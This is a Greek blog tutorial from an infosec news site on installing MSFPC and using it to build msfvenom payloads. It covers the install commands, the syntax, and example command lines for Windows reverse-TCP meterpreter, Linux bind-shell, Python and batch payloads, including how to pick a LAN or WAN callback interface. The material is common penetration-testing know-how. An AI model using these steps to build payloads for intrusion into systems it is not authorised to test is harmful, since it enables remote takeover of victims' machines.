• Skip to main content
  • Skip to header right navigation
  • Skip to site footer
iGuRu

iGuRu

Νέα Τεχνολογίας σε πραγματικό χρόνο. Απόψεις & Tweaks

  • /news
  • /infosec
  • /tools
  • /tweaks
  • /dummies
  • /απόψεις
  • /support
home / infosec / Εγκατάσταση payload με τη χρήση του MSFvenom

Εγκατάσταση payload με τη χρήση του MSFvenom

19/02/2021 10:14 by Anastasis Vasileiadis

Με τη βοήθεια του MSFPC, μπορείτε να δημιουργήσετε γρήγορα payloads με βάση το msfvenom module που είναι μέρος του Metasploit Framework.

Έτσι, το MSFvenom Payload Creator είναι ένα wrapper για τη δημιουργία πολλαπλών τύπων payloads, όπως APK (.apk), ASP (.asp), ASPX (.aspx), BASH (.sh), Java (.jsp), Linux (.elf) , OSX (.macho), Perl (.pl), PHP (.php), Powershell (.ps1), Python (.py), Tomcat (.war) και Windows (.exe / .dll).

Μπορείτε ακόμη και να δημιουργήσετε μαζικά payloads με τη βοήθεια της εντολής “batch” και να δημιουργήσετε ένα payload για όλα τα modules. Απλώς χρησιμοποιήστε το “loop“.

msfvenom - Εγκατάσταση payload με τη χρήση του MSFvenom

Εγκατάσταση του MSFPC στο Kali Linux

Η εγκατάσταση του MSFPC μπορεί να γίνει μέσω του Git Clone πληκτρολογώντας την παρακάτω εντολή:

Εντολή: git clone https://github.com/g0tmi1k/mpc.git

msfpc1 - Εγκατάσταση payload με τη χρήση του MSFvenom

Ή μπορείτε ακόμη και να εγκαταστήσετε το παραπάνω script μέσω της εντολής apt-get που είναι ήδη διαθέσιμη στο Kali Linux.

Εντολή: apt-get install -y msfpc

Πλήρης σύνταξη του MSFPC –

Εντολή: msfpc.sh (<DOMAIN / IP>) () (<CMD / MSF>) (<BIND / REVERSE>) (<STAGED / STAGELESS>) (<TCP / HTTP / HTTPS / FIND_PORT>) (<BATCH / ΒΡΟΧΟΣ>) ()

msfpc2 - Εγκατάσταση payload με τη χρήση του MSFvenom

Μερικά παραδείγματα:

  • msfpc.sh windows 192.168.1.10 # Windows με manual IP.
  • msfpc.sh elf bind eth0 4444 # Linux, IP0 & manual θύρα eth0.
  • msfpc.sh stageless cmd py https # Python, stageless γραμμή εντολών.
  • msfpc.sh verbose loop eth1 # Ένα payload για κάθε τύπο, χρησιμοποιώντας την IP του eth1.
  • msfpc.sh msf batch wan # Όλα τα πιθανά payloads του μετρητή, χρησιμοποιώντας IP WAN.
  • msfpc.sh help verbose # Οθόνη βοήθειας, με ακόμη περισσότερες πληροφορίες.

Ας προσπαθήσουμε λοιπόν να δημιουργήσουμε το payload για το windows machine πληκτρολογώντας ” bash msfpc.sh windows ” στην κονσόλα σας.

msfpc3 - Εγκατάσταση payload με τη χρήση του MSFvenom

Στο πρώτο βήμα, θα σας ζητήσει αυτόματα να χρησιμοποιήσετε τη διεπαφή (lo, eth0, wan).

Αν θέλετε να χρησιμοποιήσετε το payload σας τοπικά όπως μέσα σε μηχανήματα VM, τότε πηγαίνετε με eth0 δηλαδή 2η επιλογή και αν θέλετε να χρησιμοποιήσετε αυτό το payload για δίκτυο WAN, τότε ο 3ος αριθμός είναι η σωστή επιλογή.

msfpc4 - Εγκατάσταση payload με τη χρήση του MSFvenom

Έτσι, μετά τον ορισμό της IP στο script msfpc, θα δημιουργήσει αυτόματα το payload σας βάσει του τύπου των Windows και θα χρησιμοποιήσει τις προεπιλεγμένες ρυθμίσεις, όπως το PORT είναι το 443 που είναι η προεπιλεγμένη θύρα και το προεπιλεγμένο payload είναι το “windows / meterpreter / reverse_tcp”.

Εάν γνωρίζετε ήδη την IP σας (eth0 ή wan), τότε μπορείτε ακόμη και να χρησιμοποιήσετε την άμεση εντολή για τη δημιουργία του payload:

Εντολή: msfpc.sh windows 192.168.1.5

msfpc5 - Εγκατάσταση payload με τη χρήση του MSFvenom

Το αρχείο θα αποθηκευτεί στον κατάλογο /root/mpc .

msfpc6 - Εγκατάσταση payload με τη χρήση του MSFvenom

Για Linux, πλήρως αυτοματοποιημένη χρήση μη αυτόματης διεπαφής και θύρας

Εντολή: bash msfpc.sh elf bind eth0 4444 verbose

msfpc7 - Εγκατάσταση payload με τη χρήση του MSFvenom

Για Python, διαδραστικό μενού IP

Εντολή: bash msfpc.sh stageless cmd py tcp

msfpc8 - Εγκατάσταση payload με τη χρήση του MSFvenom

Η λειτουργία loop, δημιουργεί ένα από τα πάντα

Εντολή: ./msfpc.sh loop wan

msfpc9 - Εγκατάσταση payload με τη χρήση του MSFvenom
 
Εγκατάσταση payload με τη χρήση του MSFvenom was last modified: 19 Φεβρουαρίου, 2021, 10:14 πμ by Anastasis Vasileiadis

Subscribe to our newsletter

no spam

spread the news

  • Facebook
  • Twitter
  • Reddit
  • Εκτύπωση
  • Email

Διαβάστε τις Τεχνολογικές Ειδήσεις από όλο τον κόσμο, με την εγκυρότητα του iGuRu.gr

Ακολουθήσετε μας στο Google News


Κατηγορία: infosectag: Msfvenom, payload

You May Also Like

Hack με Ngrok, Msfvenom και Metasploit Framework
Windows 10 exploitation μόνο με μια εικόνα
Sniff HTTP πακέτων με το Wireshark

Σχετικά Anastasis Vasileiadis

Οι μεταφράσεις είναι σαν τις γυναίκες. Όταν είναι ωραίες δεν είναι πιστές και όταν είναι πιστές δεν είναι ωραίες.

Previous Post: « PEUX OS – POS εξαιρετικά προσαρμόσιμη Arch linux διανομή
Next Post: BlackMamba: Post exploitation framework (multi client) »

Reader Interactions

Comment Policy:

Tο iGuRu.gr δεν δημοσιεύει άμεσα τα σχόλια. Κακόβουλα σχόλια, σχόλια που συμπεριλαμβάνουν διαφημίσεις, ή σχόλια με ύβρεις διαγράφονται χωρίς καμία προειδοποίηση. Δεν υιοθετούμε τις απόψεις που εκφράζουν οι αναγνώστες μας.
Τα σχολιά σας θα εμφανιστούν μετά την έγκρισή τους από τους διαχειριστές


Αφήστε το σχόλιό σας
Ακύρωση απάντησης

Η ηλ. διεύθυνση σας δεν δημοσιεύεται. Τα υποχρεωτικά πεδία σημειώνονται με *

 

 © 2021 · iGuRu.gr · ☢ · Keep It Simple Stupid Genesis theme

about  ·   contact  ·  rss  ·  sitemap  ·  tos

loadingΆκυρο
Δεν ήταν δυνατή η αποστολή της δημοσίευσης - ελέγξτε την διεύθυνση email!
Ο έλεγχος του email απέτυχε, παρακαλώ προσπαθήστε ξανά
Το ιστολόγιο σας δεν μπορεί να κοινοποιεί δημοσιεύσεις μέσω email.